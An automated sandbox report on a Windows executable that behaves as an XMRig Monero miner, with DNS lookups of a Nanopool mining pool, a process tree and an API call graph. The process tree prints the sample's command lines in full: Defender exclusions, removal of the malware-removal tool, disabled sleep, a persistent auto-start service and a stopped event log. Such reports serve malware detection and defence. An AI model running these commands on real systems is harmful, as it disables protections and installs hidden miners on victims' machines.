Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 54.37.137.114 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 51.15.193.130 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 141.94.23.83 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 162.19.224.121 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 51.15.65.182 | A (IP address) | IN (0x0001) | false

                                                              Target ID:0
                                                              Start time:14:31:11
                                                              Start date:14/11/2024
                                                              Path:C:\Users\user\Desktop\rtYpMDeKUq.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\rtYpMDeKUq.exe"
                                                              Imagebase:0x7ff75e8e0000
                                                              File size:2'629'632 bytes
                                                              MD5 hash:9B1749C1BB9E8A354404B8A57DE68EC6
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:14:31:11
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                              Imagebase:0x7ff6cb6b0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:14:31:11
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                              Imagebase:0x7ff67a410000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\wusa.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                              Imagebase:0x7ff6f1cb0000
                                                              File size:345'088 bytes
                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:15
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\sc.exe delete "TASJBGYW"
                                                              Imagebase:0x7ff695370000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:17
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:18
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto"
                                                              Imagebase:0x7ff695370000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:19
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:20
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                              Imagebase:0x7ff695370000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:21
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\sc.exe start "TASJBGYW"
                                                              Imagebase:0x7ff695370000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:22
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:23
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:24
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
                                                              Imagebase:0x7ff6cd200000
                                                              File size:2'629'632 bytes
                                                              MD5 hash:9B1749C1BB9E8A354404B8A57DE68EC6
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 66%, ReversingLabs
                                                              Has exited:true

                                                              Target ID:25
                                                              Start time:14:31:16
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                              Imagebase:0x7ff6cb6b0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:26
                                                              Start time:14:31:16
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:27
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                              Imagebase:0x7ff67a410000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:28
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:29
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:30
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:31
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:32
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:33
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:34
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:35
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:36
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:37
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:38
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:svchost.exe
                                                              Imagebase:0x7ff67e6d0000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                              Has exited:false

                                                              Target ID:39
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\wusa.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                              Imagebase:0x7ff6f1cb0000
                                                              File size:345'088 bytes
                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:3.5%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:11.8%
                                                                Total number of Nodes:1578
                                                                Total number of Limit Nodes:2
7ff75e8e3b66 2750->2753 2751 7ff75e8e3c60 wcslen 2935 7ff75e8e153f 2751->2935 2753->2751 2757 7ff75e8e3d60 2760 7ff75e8e3d7a memset wcscat memset 2757->2760 2763 7ff75e8e3dd3 2760->2763 2762 7ff75e8e3e23 wcslen 2764 7ff75e8e3e35 2762->2764 2768 7ff75e8e3e7c 2762->2768 2763->2762 2765 7ff75e8e3e50 _wcsnicmp 2764->2765 2766 7ff75e8e3e66 wcslen 2765->2766 2765->2768 2766->2765 2766->2768 2767 7ff75e8e3edd wcscpy wcscat memset 2770 7ff75e8e3f1c 2767->2770 2768->2767 2769 7ff75e8e4024 wcscpy wcscat 2771 7ff75e8e404f memset 2769->2771 2775 7ff75e8e4131 2769->2775 2770->2769 2773 7ff75e8e4070 2771->2773 2772 7ff75e8e40d5 wcslen 2774 7ff75e8e40eb 2772->2774 2780 7ff75e8e412c 2772->2780 2773->2772 2777 7ff75e8e4100 _wcsnicmp 2774->2777 3107 7ff75e8e2df0 2775->3107 2778 7ff75e8e4116 wcslen 2777->2778 2777->2780 2778->2777 2778->2780 2779 7ff75e8e43a3 wcscpy wcscat memset 2781 7ff75e8e43e5 2779->2781 2780->2779 2782 7ff75e8e442a wcscpy wcscat memset 2781->2782 2783 7ff75e8e4470 2782->2783 2784 7ff75e8e44d5 wcscpy wcscat memset 2783->2784 2785 7ff75e8e451b 2784->2785 2786 7ff75e8e454b wcscpy wcscat 2785->2786 2787 7ff75e8e6779 memcpy 2786->2787 2788 7ff75e8e457d 2786->2788 2787->2788 2789 7ff75e8e2df0 11 API calls 2788->2789 2790 7ff75e8e472c 2789->2790 2791 7ff75e8e2df0 11 API calls 2790->2791 2792 7ff75e8e4840 memset 2791->2792 2794 7ff75e8e4861 2792->2794 2793 7ff75e8e48a4 wcscpy wcscat memset 2795 7ff75e8e48ed 2793->2795 2794->2793 2796 7ff75e8e4930 wcscpy wcscat wcslen 2795->2796 3119 7ff75e8e146d 2796->3119 2799 7ff75e8e4a44 2802 7ff75e8e4b3a wcslen 2799->2802 2809 7ff75e8e4d2d 2799->2809 3279 7ff75e8e157b 2802->3279 2803 7ff75e8e145e 2 API calls 2803->2799 2807 7ff75e8e4d0c memset 2807->2809 2808 7ff75e8e4c9f wcslen 3323 7ff75e8e15e4 2808->3323 2810 7ff75e8e4d9d wcscpy wcscat 2809->2810 2812 7ff75e8e4dcf 2810->2812 2816 7ff75e8e2df0 11 API calls 2812->2816 2813 7ff75e8e4bf9 2813->2807 2813->2808 2815 7ff75e8e145e 2 API calls 2815->2807 2818 7ff75e8e4ed7 2816->2818 2817 
7ff75e8e2df0 11 API calls 2819 7ff75e8e4fec 2817->2819 2818->2817 2820 7ff75e8e2df0 11 API calls 2819->2820 2821 7ff75e8e50d6 2820->2821 2822 7ff75e8e2df0 11 API calls 2821->2822 2825 7ff75e8e51c3 2822->2825 2823 7ff75e8e5304 wcslen 2824 7ff75e8e157b 2 API calls 2823->2824 2826 7ff75e8e538e 2824->2826 2825->2823 2827 7ff75e8e5396 memset 2826->2827 2831 7ff75e8e54a8 2826->2831 2828 7ff75e8e53b7 2827->2828 2829 7ff75e8e5407 wcslen 2828->2829 3326 7ff75e8e15a8 2829->3326 2830 7ff75e8e2df0 11 API calls 2838 7ff75e8e5553 2830->2838 2831->2830 2839 7ff75e8e5645 _wcsicmp 2831->2839 2834 7ff75e8e549c 2836 7ff75e8e145e 2 API calls 2834->2836 2835 7ff75e8e5477 _wcsnicmp 2835->2834 2843 7ff75e8e5cc1 2835->2843 2836->2831 2837 7ff75e8e2df0 11 API calls 2837->2839 2838->2837 2841 7ff75e8e5660 memset 2839->2841 2856 7ff75e8e59e3 2839->2856 2840 7ff75e8e5d1e wcslen 2842 7ff75e8e15a8 2 API calls 2840->2842 2845 7ff75e8e5684 2841->2845 2844 7ff75e8e5d7a 2842->2844 2843->2840 2847 7ff75e8e145e 2 API calls 2844->2847 2846 7ff75e8e56c9 wcscpy wcscat wcslen 2845->2846 2849 7ff75e8e146d 2 API calls 2846->2849 2847->2831 2848 7ff75e8e5ad7 wcslen 2850 7ff75e8e153f 2 API calls 2848->2850 2851 7ff75e8e5796 2849->2851 2852 7ff75e8e5b62 2850->2852 3343 7ff75e8e1530 2851->3343 2853 7ff75e8e145e 2 API calls 2852->2853 2855 7ff75e8e5b73 2853->2855 2869 7ff75e8e5bff 2855->2869 3589 7ff75e8e2f70 2855->3589 2856->2848 2858 7ff75e8e57d4 3376 7ff75e8e14a9 2858->3376 2859 7ff75e8e6f45 2861 7ff75e8e145e 2 API calls 2859->2861 2862 7ff75e8e6f51 2861->2862 2862->2733 2865 7ff75e8e5c5c wcslen 2866 7ff75e8e5c72 2865->2866 2881 7ff75e8e5cbc 2865->2881 2870 7ff75e8e5c90 _wcsnicmp 2866->2870 2867 7ff75e8e5870 2873 7ff75e8e145e 2 API calls 2867->2873 2868 7ff75e8e5b9c 3593 7ff75e8e38e0 2868->3593 2869->2865 2874 7ff75e8e5ca6 wcslen 2870->2874 2870->2881 2877 7ff75e8e5864 2873->2877 2874->2870 2874->2881 3518 7ff75e8e3350 memset 2877->3518 2878 7ff75e8e5e29 memset wcscpy wcscat 2882 7ff75e8e2f70 2 API calls 
2878->2882 2879 7ff75e8e5858 2883 7ff75e8e145e 2 API calls 2879->2883 2880 7ff75e8e14c7 2 API calls 2884 7ff75e8e5bf1 2880->2884 2881->2878 2886 7ff75e8e5e80 2882->2886 2883->2877 2884->2869 2889 7ff75e8e145e 2 API calls 2884->2889 2888 7ff75e8e3350 11 API calls 2886->2888 2891 7ff75e8e5e98 2888->2891 2889->2869 2892 7ff75e8e14c7 2 API calls 2891->2892 2893 7ff75e8e5ec6 memset 2892->2893 2896 7ff75e8e5ee7 2893->2896 2894 7ff75e8e2df0 11 API calls 2902 7ff75e8e5948 2894->2902 2895 7ff75e8e58bf 2895->2894 2897 7ff75e8e5f37 wcslen 2896->2897 2898 7ff75e8e5f87 wcscat memset 2897->2898 2899 7ff75e8e5f49 2897->2899 2906 7ff75e8e5fc1 2898->2906 2901 7ff75e8e5f60 _wcsnicmp 2899->2901 2901->2898 2904 7ff75e8e5f72 wcslen 2901->2904 2903 7ff75e8e2df0 11 API calls 2902->2903 2907 7ff75e8e4234 2903->2907 2904->2898 2904->2901 2905 7ff75e8e6024 wcscpy wcscat 2908 7ff75e8e6059 2905->2908 2906->2905 2907->2733 2909 7ff75e8e6eb9 memcpy 2908->2909 2910 7ff75e8e6181 2908->2910 2909->2910 2911 7ff75e8e6347 wcslen 2910->2911 2912 7ff75e8e153f 2 API calls 2911->2912 2913 7ff75e8e63d2 2912->2913 2914 7ff75e8e145e 2 API calls 2913->2914 2915 7ff75e8e63e3 2914->2915 2916 7ff75e8e647b 2915->2916 2918 7ff75e8e2f70 2 API calls 2915->2918 2917 7ff75e8e145e 2 API calls 2916->2917 2917->2907 2919 7ff75e8e6410 2918->2919 2920 7ff75e8e38e0 11 API calls 2919->2920 2921 7ff75e8e6435 2920->2921 2922 7ff75e8e14c7 2 API calls 2921->2922 2923 7ff75e8e646d 2922->2923 2923->2916 2924 7ff75e8e145e 2 API calls 2923->2924 2924->2916 2928 7ff75e8e1bc2 2925->2928 2926 7ff75e8e1c04 memcpy 2926->2742 2928->2926 2929 7ff75e8e1c45 VirtualQuery 2928->2929 2930 7ff75e8e1cf4 2928->2930 2929->2930 2934 7ff75e8e1c72 2929->2934 2931 7ff75e8e1d23 GetLastError 2930->2931 2933 7ff75e8e1d37 2931->2933 2932 7ff75e8e1ca4 VirtualProtect 2932->2926 